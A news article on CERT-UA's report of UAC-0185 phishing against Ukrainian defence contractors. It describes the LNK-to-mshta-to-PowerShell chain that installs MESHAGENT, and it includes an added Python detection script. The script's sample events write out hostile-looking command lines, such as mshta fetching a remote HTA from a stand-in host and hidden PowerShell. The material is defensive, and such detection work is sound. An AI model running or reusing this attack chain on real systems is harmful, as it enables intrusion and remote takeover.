Ukraine has said that Russian state-linked threat actors have been targeting its defence contractors.
Ukraine’s Computer Emergency Response Team (CERT-UA) released a report saying that a group called UAC-0185 had been sending emails containing malicious links to employees of Ukrainian defence contractors and the defence force.
According to CERT-UA, the threat group posed as the Ukrainian Union of Industrialists and Entrepreneurs and claimed to be inviting staff to a real conference, held on 5 November, on the transition of Ukrainian defence products to NATO standards.
The emails contained a link that the threat actors claimed led to details of the invitation, but which instead downloaded a file called “list_02-1-437.lnk”.
“Opening the LNK file will download and launch the ‘start.hta’ file using the standard mshta.exe utility,” said CERT-UA.
“The mentioned HTA file contains JavaScript code designed to launch two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second – download the ‘Front.png’ file, which is a ZIP archive containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the archive to the ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ directory and launch the ‘Main.bat’ BAT file.
“The latter will move the ‘Registry.hta’ file to the autorun directory, execute it, and delete some of the downloaded files from the computer.
“Finally, ‘Registry.hta’ will launch ‘update.exe’, which is classified as a remote control program MESHAGENT.”
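As an added example (not CERT-UA's or the article's own code), the following Python sketches detection logic for each stage of the chain described above, run over constructed process-creation events of the kind a Sysmon Event ID 1 record would carry. The staging and Startup directory strings follow the report's description; the user name, file paths and URL in the sample events are assumptions.

```python
STAGING_DIR = "\\microsoft\\edgeupdate\\update\\"  # %LOCALAPPDATA% staging path from the report
STARTUP_DIR = "\\start menu\\programs\\startup\\"  # per-user autorun (Startup) folder

def _base(path: str) -> str:
    """File name of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    image, parent = _base(event.get("Image", "")), _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # Stage 1: the LNK, opened from Explorer, runs mshta.exe on start.hta
    if image == "mshta.exe" and parent == "explorer.exe" and ".hta" in cmd:
        hits.append("mshta_hta_from_explorer")
    # Stage 2: the HTA's JavaScript spawns PowerShell
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell_child_of_mshta")
    # Stage 3: Main.bat / update.exe executed from the fake EdgeUpdate directory
    if STAGING_DIR in cmd or STAGING_DIR in event.get("Image", "").lower():
        hits.append("exec_from_fake_edgeupdate_dir")
    # Stage 4: Registry.hta launched from the Startup (autorun) folder
    if image == "mshta.exe" and STARTUP_DIR in cmd:
        hits.append("hta_in_startup_folder")
    return hits

def scan(events: list) -> dict:
    """Group the triggering image names under each rule, for triage."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(_base(ev.get("Image", "")))
    return findings

# Constructed sample events (not real telemetry); user name, paths and URL are assumed.
LOCAL = r"C:\Users\victim\AppData\Local"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://example.invalid/start.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "powershell.exe -w hidden -c PLACEHOLDER"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": "powershell.exe",
     "CommandLine": "cmd.exe /c " + LOCAL + r"\Microsoft\EdgeUpdate\Update\Main.bat"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registry.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe letter.docx"},  # benign control event
]
```

Calling scan(SAMPLE_EVENTS) returns each fired rule mapped to the image names that triggered it; the Startup-folder event fires both the Explorer-to-mshta rule and the autorun rule, which is the expected overlap at logon.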
The malware delivered by these files has reportedly been used in cyber attacks since early 2023.
While Ukraine did not name Russia as being behind the attacks, UAC-0185, also known as UNC4221, was connected to the Russian government by SentinelOne earlier this year.
The group has been active since at least 2022, according to CERT-UA, and focuses on stealing credentials for Signal, Telegram, WhatsApp and a number of military systems such as DELTA, TENETA and Kropyva.
“At the same time, cyber attacks are carried out to a more limited extent, aimed at obtaining unauthorised remote access to computers of employees of the defence-industrial complex enterprises, as well as the Defense Forces of Ukraine using specialised software tools, in particular, MESHAGENT and ULTRAVNC,” said CERT-UA.